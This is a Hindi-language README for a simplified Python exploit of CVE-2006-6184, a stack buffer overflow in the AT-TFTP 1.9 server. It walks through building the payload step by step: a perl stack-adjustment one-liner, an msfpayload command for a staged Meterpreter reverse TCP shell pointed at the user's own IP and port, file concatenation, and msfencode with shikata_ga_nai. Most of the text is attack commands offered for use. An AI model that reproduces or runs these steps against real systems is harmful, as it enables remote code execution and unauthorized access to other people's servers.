
https://github.com/shauntdergrigorian/cve-2006-6184 का सरलीकृत संस्करण
यह CVE-2006-6184 के लिए एक पायथन-आधारित स्टैंडअलोन एक्सप्लॉइट है। यह एक्सप्लॉइट Allied Telesyn TFTP Server (AT-TFTP) 1.9 और संभवतः पहले के संस्करणों में स्टैक-आधारित बफर ओवरफ्लो ट्रिगर करता है, जो दूरस्थ हमलावरों को सेवा से वंचित करने या मनमाना कोड निष्पादित करने की अनुमति देता है।
आपको नहीं लगता था कि यह इतना आसान होगा, है ना? पेलोड को आपके अपने IP पते और सुनने वाले पोर्ट को शामिल करने के लिए अनुकूलित किया जाना चाहिए, इसलिए आपको इसे स्वयं उत्पन्न करने की आवश्यकता होगी। ऐसा करने के लिए, निम्नलिखित चरणों का उपयोग करें:
1.) स्टैक पॉइंटर से घटाए जाने वाली राशि (3500) का हेक्स फ़ाइल बनाने के लिए निम्नलिखित दर्ज करें:
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) इसके बाद, एक स्टेज्ड मीटरप्रेटर शेल पेलोड बनाने के लिए निम्नलिखित कमांड का उपयोग करें:
msfpayload windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
3.) फिर, आपके द्वारा अभी बनाई गई दो फ़ाइलों को संयोजित करें।
cat stackadj payload > shellcode
4.) अंत में, बुरे अक्षरों को हटा दें।
cat shellcode | msfencode -b '\x00' -e x86/shikata_ga_nai -t python
आउटपुट को "payload" वेरिएबल के मान के रूप में दर्ज करें।